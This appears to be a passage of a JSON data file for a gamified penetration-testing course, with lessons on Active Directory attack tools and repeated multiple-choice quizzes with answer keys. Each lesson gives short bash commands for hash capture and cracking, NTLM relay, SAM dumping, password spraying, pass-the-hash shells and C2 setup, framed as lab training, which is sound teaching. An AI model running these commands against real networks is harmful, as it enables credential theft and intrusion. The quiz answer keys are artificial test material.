Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"g-ex-responder","cat":"Exploitation","title":"Responder Hash Capture","diff":2,"xp":150,"intro":"Answer broadcast name resolution to capture hashes.","sections":[{"type":"text","content":"Answer broadcast name resolution to capture hashes."},{"type":"code","lang":"bash","content":"sudo responder -I eth0 -rdwv\n# Hashes in: /usr/share/responder/logs/\nhashcat -m 5600 hashes.txt rockyou.txt"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Responder captures...","opts":["Cleartext passwords","NTLMv2 hashes from broadcast name resolution","SSH keys","Certificates"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"g-ex-ntlmrelayx","cat":"Exploitation","title":"NTLM Relay Attacks","diff":3,"xp":200,"intro":"Relay captured hashes instead of cracking them.","sections":[{"type":"text","content":"Relay captured hashes instead of cracking them."},{"type":"code","lang":"bash","content":"# Find relayable targets\ncrackmapexec smb 10.0.0.0/24 --gen-relay-list targets.txt\n# Relay\nimpacket-ntlmrelayx -tf targets.txt -smb2support"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"NTLM relay works when...","opts":["All systems","SMB signing is not required on the target","The password is weak","Kerberos is disabled"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"g-ex-crackmapexec2","cat":"Exploitation","title":"CrackMapExec Exploitation","diff":2,"xp":150,"intro":"Network-wide credential testing and command execution.","sections":[{"type":"text","content":"Network-wide credential testing and command execution."},{"type":"code","lang":"bash","content":"crackmapexec smb 10.0.0.0/24\ncrackmapexec smb target -u admin -H hash --sam\ncrackmapexec smb target -u admin -p pass -x 'whoami'"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"CME's --sam flag dumps...","opts":["Network config","Local password hashes from the SAM database","Event logs","File listings"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"g-px-kerbrute","cat":"Post-Exploitation","title":"Kerbrute User Enumeration","diff":2,"xp":150,"intro":"Enumerate valid AD users via Kerberos.","sections":[{"type":"text","content":"Enumerate valid AD users via Kerberos."},{"type":"code","lang":"bash","content":"kerbrute userenum -d domain.local users.txt --dc DC\nkerbrute passwordspray -d domain.local users.txt 'Pass123!'"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Kerbrute uses Kerberos to...","opts":["Scan ports","Enumerate valid usernames and spray passwords","Capture hashes","Create tickets"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"g-px-evil-winrm","cat":"Post-Exploitation","title":"Evil-WinRM Remote Shell","diff":2,"xp":150,"intro":"PowerShell remote access with pass-the-hash support.","sections":[{"type":"text","content":"PowerShell remote access with pass-the-hash support."},{"type":"code","lang":"bash","content":"evil-winrm -i target -u admin -p password\nevil-winrm -i target -u admin -H ntlm_hash"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Evil-WinRM connects via...","opts":["SSH","WinRM (PowerShell remoting) port 5985/5986","RDP","SMB"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"g-px-bloodhound2","cat":"Post-Exploitation","title":"BloodHound Collection","diff":2,"xp":150,"intro":"Collect AD data for attack path analysis.","sections":[{"type":"text","content":"Collect AD data for attack path analysis."},{"type":"code","lang":"bash","content":"SharpHound.exe --CollectionMethods All --Domain domain.local\n# Or from Linux:\nbloodhound-python -c all -d domain.local -u user -p pass"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"SharpHound collects...","opts":["Port scan data","AD relationships: users, groups, ACLs, sessions, trusts","Vulnerability data","File contents"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"g-px-powershell-empire","cat":"Post-Exploitation","title":"PowerShell Empire C2","diff":3,"xp":200,"intro":"Post-exploitation C2 framework for Windows.","sections":[{"type":"text","content":"Post-exploitation C2 framework for Windows."},{"type":"code","lang":"bash","content":"# Empire provides:\n# - PowerShell and Python agents\n# - Credential harvesting\n# - Lateral movement modules\n# - Persistence modules\n./empire client"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Empire agents communicate via...","opts":["Raw TCP","HTTP/HTTPS (blends with normal traffic)","DNS only","ICMP only"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"g-px-covenant","cat":"Post-Exploitation","title":"Covenant C2 Framework","diff":3,"xp":200,"intro":"Modern .NET C2 framework.","sections":[{"type":"text","content":"Modern .NET C2 framework."},{"type":"code","lang":"bash","content":"# Covenant provides:\n# - .NET implants (Grunts)\n# - Task-based execution\n# - Team collaboration\n# - Web-based interface\ndotnet run --urls http://0.0.0.0:7443"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Covenant uses which implant type?","opts":["Python","C#/.NET (Grunts)","PowerShell","Bash"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets 